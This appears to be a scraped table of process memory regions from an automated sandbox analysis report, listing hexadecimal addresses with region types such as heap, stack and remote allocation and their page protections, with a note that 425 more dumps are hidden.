91499B8000
|
stack
|
page read and write
|
||
|
1C4E455D000
|
heap
|
page read and write
|
||
|
C64627E000
|
stack
|
page read and write
|
||
|
7FF7C14E0000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4517000
|
heap
|
page read and write
|
||
|
1C4E455D000
|
heap
|
page read and write
|
||
|
2632961D000
|
heap
|
page read and write
|
||
|
1C4E454A000
|
heap
|
page read and write
|
||
|
7FF7C13D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7F1DEE000
|
unkown
|
page readonly
|
||
|
1EFDF2A2000
|
trusted library allocation
|
page read and write
|
||
|
22C40A67000
|
heap
|
page read and write
|
||
|
24D89BB5000
|
heap
|
page read and write
|
||
|
22C40A0B000
|
heap
|
page read and write
|
||
|
2AD15306000
|
heap
|
page read and write
|
||
|
263214D1000
|
trusted library allocation
|
page read and write
|
||
|
1C4E455A000
|
heap
|
page read and write
|
||
|
26329A40000
|
heap
|
page read and write
|
||
|
24D899A0000
|
heap
|
page read and write
|
||
|
1C4E4524000
|
heap
|
page read and write
|
||
|
263217A1000
|
trusted library allocation
|
page read and write
|
||
|
1EFDF2E0000
|
heap
|
page read and write
|
||
|
22C409F1000
|
heap
|
page read and write
|
||
|
7FF7C1510000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1256000
|
trusted library allocation
|
page read and write
|
||
|
2630F616000
|
heap
|
page read and write
|
||
|
1EFDF7A0000
|
heap
|
page execute and read and write
|
||
|
7FF700E41000
|
unkown
|
page execute read
|
||
|
1EFDD927000
|
heap
|
page read and write
|
||
|
26329760000
|
heap
|
page execute and read and write
|
||
|
1C4E4700000
|
heap
|
page read and write
|
||
|
26321533000
|
trusted library allocation
|
page read and write
|
||
|
1EFDD800000
|
heap
|
page read and write
|
||
|
2AD15386000
|
heap
|
page read and write
|
||
|
C645D0E000
|
stack
|
page read and write
|
||
|
26312C8B000
|
trusted library allocation
|
page read and write
|
||
|
7FF7F1D91000
|
unkown
|
page execute read
|
||
|
2AD154C0000
|
heap
|
page read and write
|
||
|
1EFDD830000
|
heap
|
page read and write
|
||
|
7FF7F1E10000
|
unkown
|
page readonly
|
||
|
22C409EF000
|
heap
|
page read and write
|
||
|
1C4E4528000
|
heap
|
page read and write
|
||
|
24D89B58000
|
heap
|
page read and write
|
||
|
26313506000
|
trusted library allocation
|
page read and write
|
||
|
C64657F000
|
stack
|
page read and write
|
||
|
2AD1533F000
|
heap
|
page read and write
|
||
|
1EFF7871000
|
heap
|
page read and write
|
||
|
1C4E4549000
|
heap
|
page read and write
|
||
|
1EFF7B4A000
|
heap
|
page read and write
|
||
|
24D89B9B000
|
heap
|
page read and write
|
||
|
26321675000
|
trusted library allocation
|
page read and write
|
||
|
7FF700EC0000
|
unkown
|
page readonly
|
||
|
2630F677000
|
heap
|
page read and write
|
||
|
9149BBE000
|
stack
|
page read and write
|
||
|
2630F825000
|
heap
|
page read and write
|
||
|
1EFF7898000
|
heap
|
page read and write
|
||
|
1EFF7D20000
|
heap
|
page read and write
|
||
|
2AD1532A000
|
heap
|
page read and write
|
||
|
7FF700E40000
|
unkown
|
page readonly
|
||
|
2AD15386000
|
heap
|
page read and write
|
||
|
24D89B63000
|
heap
|
page read and write
|
||
|
7FF7C1460000
|
trusted library allocation
|
page read and write
|
||
|
24D89B89000
|
heap
|
page read and write
|
||
|
35AF8FE000
|
stack
|
page read and write
|
||
|
1EFEF822000
|
trusted library allocation
|
page read and write
|
||
|
24D89BA5000
|
heap
|
page read and write
|
||
|
7FF7F1E0F000
|
unkown
|
page write copy
|
||
|
2AD15303000
|
heap
|
page read and write
|
||
|
9149A39000
|
stack
|
page read and write
|
||
|
2AD1530B000
|
heap
|
page read and write
|
||
|
26311090000
|
heap
|
page read and write
|
||
|
7FF7F1D91000
|
unkown
|
page execute read
|
||
|
2630F710000
|
heap
|
page read and write
|
||
|
91492D2000
|
stack
|
page read and write
|
||
|
24D89B89000
|
heap
|
page read and write
|
||
|
7FF7C1480000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1430000
|
trusted library allocation
|
page read and write
|
||
|
1EFF7B18000
|
heap
|
page read and write
|
||
|
1C4E455D000
|
heap
|
page read and write
|
||
|
1EFDFC27000
|
trusted library allocation
|
page read and write
|
||
|
91493DE000
|
stack
|
page read and write
|
||
|
2AD15344000
|
heap
|
page read and write
|
||
|
22C40910000
|
heap
|
page read and write
|
||
|
7FF700E41000
|
unkown
|
page execute read
|
||
|
7FF7C11A4000
|
trusted library allocation
|
page read and write
|
||
|
22C40A0A000
|
heap
|
page read and write
|
||
|
7FF7C14C0000
|
trusted library allocation
|
page read and write
|
||
|
2AD1532A000
|
heap
|
page read and write
|
||
|
7FF700E40000
|
unkown
|
page readonly
|
||
|
2AD152C0000
|
heap
|
page read and write
|
||
|
22C40A0B000
|
heap
|
page read and write
|
||
|
1C4E4720000
|
heap
|
page read and write
|
||
|
263295D0000
|
heap
|
page read and write
|
||
|
1C4E454A000
|
heap
|
page read and write
|
||
|
22C409D0000
|
heap
|
page read and write
|
||
|
1EFDF250000
|
trusted library allocation
|
page read and write
|
||
|
2AD15660000
|
heap
|
page read and write
|
||
|
7FF7F1E10000
|
unkown
|
page readonly
|
||
|
C6F63FF000
|
stack
|
page read and write
|
||
|
7FF7C1490000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11BB000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4549000
|
heap
|
page read and write
|
||
|
7FF7C14C0000
|
trusted library allocation
|
page read and write
|
||
|
1EFDD8A0000
|
heap
|
page read and write
|
||
|
24D89B6E000
|
heap
|
page read and write
|
||
|
26329A5E000
|
heap
|
page read and write
|
||
|
7FF7C11FB000
|
trusted library allocation
|
page read and write
|
||
|
1EFDD929000
|
heap
|
page read and write
|
||
|
7FF7C14A0000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4740000
|
remote allocation
|
page read and write
|
||
|
1EFF7819000
|
heap
|
page read and write
|
||
|
7FF7C1380000
|
trusted library allocation
|
page read and write
|
||
|
C64617E000
|
stack
|
page read and write
|
||
|
7FF7C13B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C11E2000
|
trusted library allocation
|
page read and write
|
||
|
AACE70C000
|
stack
|
page read and write
|
||
|
1EFF784E000
|
heap
|
page read and write
|
||
|
1C4E458C000
|
heap
|
page read and write
|
||
|
2630F770000
|
trusted library allocation
|
page read and write
|
||
|
9149C3E000
|
stack
|
page read and write
|
||
|
AACEBFF000
|
stack
|
page read and write
|
||
|
2630F638000
|
heap
|
page read and write
|
||
|
24D89E00000
|
heap
|
page read and write
|
||
|
24D89B9B000
|
heap
|
page read and write
|
||
|
1C4E455D000
|
heap
|
page read and write
|
||
|
2AD15329000
|
heap
|
page read and write
|
||
|
7FF7C11A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
C64714B000
|
stack
|
page read and write
|
||
|
7FF7C1250000
|
trusted library allocation
|
page read and write
|
||
|
1EFDDC10000
|
heap
|
page read and write
|
||
|
22C40A4E000
|
heap
|
page read and write
|
||
|
1C4E4559000
|
heap
|
page read and write
|
||
|
7FF7C139A000
|
trusted library allocation
|
page read and write
|
||
|
9149B3F000
|
stack
|
page read and write
|
||
|
7FF7C13C2000
|
trusted library allocation
|
page read and write
|
||
|
1EFEF7BF000
|
trusted library allocation
|
page read and write
|
||
|
1EFDF230000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11E4000
|
trusted library allocation
|
page read and write
|
||
|
2630F634000
|
heap
|
page read and write
|
||
|
1C4E4527000
|
heap
|
page read and write
|
||
|
22C40C70000
|
heap
|
page read and write
|
||
|
2AD152B0000
|
heap
|
page read and write
|
||
|
24D89AC0000
|
remote allocation
|
page read and write
|
||
|
7FF7F1D91000
|
unkown
|
page execute read
|
||
|
91496FD000
|
stack
|
page read and write
|
||
|
7FF7F1D90000
|
unkown
|
page readonly
|
||
|
7FF700EC0000
|
unkown
|
page readonly
|
||
|
7FF7C1500000
|
trusted library allocation
|
page read and write
|
||
|
26313451000
|
trusted library allocation
|
page read and write
|
||
|
1EFDF336000
|
heap
|
page read and write
|
||
|
22C40A4E000
|
heap
|
page read and write
|
||
|
7FF7C1382000
|
trusted library allocation
|
page read and write
|
||
|
263295E4000
|
heap
|
page read and write
|
||
|
7FF7C1296000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4530000
|
heap
|
page read and write
|
||
|
1EFDF7B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF700EBF000
|
unkown
|
page write copy
|
||
|
7FF7F1E10000
|
unkown
|
page readonly
|
||
|
2AD15388000
|
heap
|
page read and write
|
||
|
22C40A34000
|
heap
|
page read and write
|
||
|
24D89AC0000
|
remote allocation
|
page read and write
|
||
|
7FF7C14F0000
|
trusted library allocation
|
page read and write
|
||
|
1C4E455C000
|
heap
|
page read and write
|
||
|
24D89BB5000
|
heap
|
page read and write
|
||
|
1EFF79C0000
|
heap
|
page read and write
|
||
|
22C409ED000
|
heap
|
page read and write
|
||
|
24D89BCE000
|
heap
|
page read and write
|
||
|
1EFE193F000
|
trusted library allocation
|
page read and write
|
||
|
C64607E000
|
stack
|
page read and write
|
||
|
1EFDF260000
|
heap
|
page readonly
|
||
|
1EFDF2F0000
|
trusted library allocation
|
page read and write
|
||
|
24D89AC0000
|
remote allocation
|
page read and write
|
||
|
7FF7C1450000
|
trusted library allocation
|
page read and write
|
||
|
1C4E458C000
|
heap
|
page read and write
|
||
|
7FF700EBF000
|
unkown
|
page read and write
|
||
|
1C4E4523000
|
heap
|
page read and write
|
||
|
7FF7C14B0000
|
trusted library allocation
|
page read and write
|
||
|
C645DCE000
|
stack
|
page read and write
|
||
|
2630F5FA000
|
heap
|
page read and write
|
||
|
7FF7C11AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
22C409ED000
|
heap
|
page read and write
|
||
|
22C409E8000
|
heap
|
page read and write
|
||
|
9149AB9000
|
stack
|
page read and write
|
||
|
1EFF789F000
|
heap
|
page read and write
|
||
|
7FF7C1391000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4620000
|
heap
|
page read and write
|
||
|
1EFDF270000
|
trusted library allocation
|
page read and write
|
||
|
1EFF77E1000
|
heap
|
page read and write
|
||
|
1C4E4573000
|
heap
|
page read and write
|
||
|
7FF700E40000
|
unkown
|
page readonly
|
||
|
7FF700EC0000
|
unkown
|
page readonly
|
||
|
1EFEF7B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C12A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C135A000
|
trusted library allocation
|
page read and write
|
||
|
2AD152E0000
|
remote allocation
|
page read and write
|
||
|
7FF7C1520000
|
trusted library allocation
|
page read and write
|
||
|
2630F630000
|
heap
|
page read and write
|
||
|
7FF7C14A0000
|
trusted library allocation
|
page read and write
|
||
|
1EFF7812000
|
heap
|
page read and write
|
||
|
7FF7C1370000
|
trusted library allocation
|
page execute and read and write
|
||
|
2632960D000
|
heap
|
page read and write
|
||
|
7FF7C1520000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1550000
|
trusted library allocation
|
page read and write
|
||
|
2630F5D0000
|
heap
|
page read and write
|
||
|
24D89B6B000
|
heap
|
page read and write
|
||
|
22C40A1E000
|
heap
|
page read and write
|
||
|
91497FE000
|
stack
|
page read and write
|
||
|
7FF7C13B0000
|
trusted library allocation
|
page read and write
|
||
|
2AD1536D000
|
heap
|
page read and write
|
||
|
24D89A80000
|
heap
|
page read and write
|
||
|
C64667E000
|
stack
|
page read and write
|
||
|
35AF6FC000
|
stack
|
page read and write
|
||
|
2AD152E0000
|
remote allocation
|
page read and write
|
||
|
22C40A34000
|
heap
|
page read and write
|
||
|
22C40920000
|
heap
|
page read and write
|
||
|
C6463F9000
|
stack
|
page read and write
|
||
|
7FF7C1490000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4528000
|
heap
|
page read and write
|
||
|
7FF7C129C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4E4563000
|
heap
|
page read and write
|
||
|
7FF7C14F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1286000
|
trusted library allocation
|
page execute and read and write
|
||
|
C646377000
|
stack
|
page read and write
|
||
|
2631367C000
|
trusted library allocation
|
page read and write
|
||
|
26329766000
|
heap
|
page execute and read and write
|
||
|
24D89BCE000
|
heap
|
page read and write
|
||
|
263294C6000
|
heap
|
page read and write
|
||
|
24D89B66000
|
heap
|
page read and write
|
||
|
2AD1536D000
|
heap
|
page read and write
|
||
|
22C40960000
|
remote allocation
|
page read and write
|
||
|
1C4E458C000
|
heap
|
page read and write
|
||
|
C6470CE000
|
stack
|
page read and write
|
||
|
7FF7C11C0000
|
trusted library allocation
|
page read and write
|
||
|
263114C1000
|
trusted library allocation
|
page read and write
|
||
|
1EFEF965000
|
trusted library allocation
|
page read and write
|
||
|
7DF4708E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7F1E0F000
|
unkown
|
page read and write
|
||
|
7FF700EBF000
|
unkown
|
page read and write
|
||
|
1EFDD8AA000
|
heap
|
page read and write
|
||
|
22C40A4E000
|
heap
|
page read and write
|
||
|
1EFE0F35000
|
trusted library allocation
|
page read and write
|
||
|
2AD15310000
|
heap
|
page read and write
|
||
|
914977E000
|
stack
|
page read and write
|
||
|
C6460FC000
|
stack
|
page read and write
|
||
|
7FF7C1360000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C1340000
|
trusted library allocation
|
page read and write
|
||
|
22C40A1C000
|
heap
|
page read and write
|
||
|
C645D8E000
|
stack
|
page read and write
|
||
|
24D89B50000
|
heap
|
page read and write
|
||
|
1EFF7817000
|
heap
|
page read and write
|
||
|
26311176000
|
heap
|
page read and write
|
||
|
26329A81000
|
heap
|
page read and write
|
||
|
1EFDD931000
|
heap
|
page read and write
|
||
|
7FF7F1D90000
|
unkown
|
page readonly
|
||
|
2630F7A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C13D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
35AF9FE000
|
stack
|
page read and write
|
||
|
22C40A24000
|
heap
|
page read and write
|
||
|
1EFDD901000
|
heap
|
page read and write
|
||
|
7FF7C1450000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C14B0000
|
trusted library allocation
|
page read and write
|
||
|
26311140000
|
heap
|
page execute and read and write
|
||
|
1C4E47B0000
|
heap
|
page read and write
|
||
|
7FF7C11FC000
|
trusted library allocation
|
page execute and read and write
|
There are 425 hidden memdumps, click here to show them.